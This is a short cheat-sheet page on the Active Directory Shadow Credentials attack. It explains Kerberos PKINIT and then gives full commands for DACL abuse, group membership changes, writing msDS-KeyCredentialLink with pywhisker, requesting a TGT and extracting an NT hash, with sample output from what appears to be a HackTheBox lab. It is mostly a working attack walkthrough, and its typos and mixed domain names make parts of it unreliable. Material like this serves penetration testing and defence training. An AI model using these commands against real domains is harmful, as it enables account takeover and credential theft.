Shadow Credentials
Shadow credentials | AS-REQ | AS-REP | Account takeover
The Kerberpos authentication protocol works with tickets, like an TGS can be obtained by presenting a TGT. That prior TGT can be obtained by validing a first step "pre-authentication", when this is removed from an account it vulnerable for ASREProast. Validatino for pre-authentication works symmetricallyl or (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates).
The asymmetrical way of pre-authenticating, working with certificates is called PKINIT.
PKINIT
In Kerberos authentication clients must perform "pre-authentication" before the KDC provides a TGT which can be used for Service Tickets. Without pre-authentication anyone could obtain the key with a password like in AS-REP Roasting.
The pre-authentication works with a timestamp to prevent replay attacks. Most used is the symmetric key and less common asymmetric key approach which works with a public-private key pair. It encrypts pre-authentication data with private key, and the KDC decrypts it with the public key. The KDC has the keys as well allowing for exchange session key.
Abuse
In order to exploit this technique we need:
A minimum of one Windows Server 2016 Domain Controller is needed with PKNIT support.
The Domain Controller must have a server authentication digital certificate installed, and DC has its own key pair for exhange.
Have control over account that can edit target objects
msDs-KeyCredentialLinkattribute.
The attack
Create an RSA key pair
Create an X509 certificate configured with the public key
Create a KeyCredential structure featuring the raw public key and add it to the
msDs-KeyCredentialLinkattributeAuthenticate using PKINIT and the certificate and private ke
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add"Shadow credential attack
Example attack using DACL abuse and retrieving hash. In this scenario we have WriteOwner over user1 and GenericAll over user2.
# Enable Addmembers
python dacledit.py -action 'write' -rights 'WriteMembers' -principal 'user1' -target-dn 'CN=ZEN,CN=USERS,DC=CERTIFIED,DC=HTB' 'zencorp.aaa/user1':'pass123'Next we add user1 to Zen group.
# Add member to group Zen
net rpc group addmem "Zen" "user1" -U "zencorp.aaa"/"user1"%"pass123" -S "DC01.zencorp.htb"Generate keys and certifcate
python3 pywhisker.py -d "zencorp.aaa" -u "user1" -p 'pass123' --target "user2" --action "add"
# Will output
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: aacadbaa-8f06-2f9a-33ab-19bcad12694f
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: WElBKRZS.pfx
[*] Must be used with password: 1JHPFhefkg77PqfH8qGn
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtoolsNow can request a TGT
gettgtpkinit.py certified.htb/management_svc -cert-pfx WElBKRZS.pfx -pfx-pass '1JHPFhefkg77PqfH8qGn' user.ccacheAnd finally we can get the NT hash
KRB5CCNAME=user.ccache python3 getnthash.py test.local/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773Last updated
Was this helpful?